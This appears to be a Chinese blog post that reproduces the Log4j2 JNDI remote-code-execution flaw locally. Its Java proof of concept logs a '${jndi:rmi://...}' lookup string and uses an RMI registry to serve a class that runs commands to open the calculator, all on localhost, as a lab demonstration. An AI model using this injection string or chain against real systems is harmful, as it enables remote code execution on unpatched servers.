Log4j2漏洞代碼復現
代碼如下:
package poc;
import java.io.Serializable;
import java.rmi.Remote;
public class CalcTest implements Remote, Serializable {
static {
try {
System.err.println("遠程代碼開始執行了...");
Runtime runtime = Runtime.getRuntime();
String osName = System.getProperty("os.name");
System.err.println(osName);
if (osName.startsWith("Mac OS")) {
String[] commands = {"open", "/System/Applications/Calculator.app"};
runtime.exec(commands);
} else if (osName.startsWith("Windows")) {
// windows
String[] commands = {"calc"};
runtime.exec(commands);
}
System.err.println("遠程代碼被執行了...");
} catch (Exception e) {
e.printStackTrace();
}
System.out.println("Hack_code執行了....");
}
public String show(){
System.out.println(name+"遠程呼叫執行");
return "Result";
}
private String name;
public CalcTest(String name){
this.name=name;
}
}
package poc;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4j2Test {
private static Logger Logger=LogManager.getLogger(Log4j2Test.class);
public static void main(String[] args) {
String username="${jndi:rmi://127.0.0.1:1099/hack}";
Logger.error(username);
}
}
package poc;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.util.concurrent.CountDownLatch;
/**
* 注冊Service
*/
public class RegisterService1099 {
public static void main(String[] args) throws InterruptedException {
try {
LocateRegistry.createRegistry(1099); //Registry使用8000埠
} catch (RemoteException e) {
e.printStackTrace();
}
CountDownLatch latch=new CountDownLatch(1);
latch.await(); //掛起主執行緒,否則應用會退出
}
}
package poc;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RmiClient {
public static void main(String[] args) throws RemoteException, NotBoundException {
Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); //獲取注冊中心參考
CalcTest remote = (CalcTest) registry.lookup("calc"); //獲取RemoteHello服務
System.out.println("Client:呼叫遠程方法:"+remote.show()); //呼叫遠程方法
}
}
package poc;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
*
*/
public class RmiService {
public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); //獲取Registry
// 最后一個引數不指定的話,那么這個類的創建就在本地的jvm中,如果指定那么就在指定的服務器上進行創建
Reference reference=new Reference("poc.CalcTest","poc.CalcTest",null);
ReferenceWrapper referenceWrapper=new ReferenceWrapper(reference);
registry.bind("hack",referenceWrapper);
// 下面的呼叫直接獲取到物件
CalcTest calcTest=new CalcTest("RmiService");
registry.bind("calc",calcTest);
System.out.println("CalcTestService已經注冊");
}
}
注意:先運行RegisterService1099再運行RmiService最后運行客戶端或者Log4j2Test,
本人也是參考了blibli的視頻所寫,有問題一起交流,謝謝!
參考:https://www.jianshu.com/p/de85fad05dcb
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/379401.html
標籤:其他
上一篇:一問三不知之log4j2漏洞簡析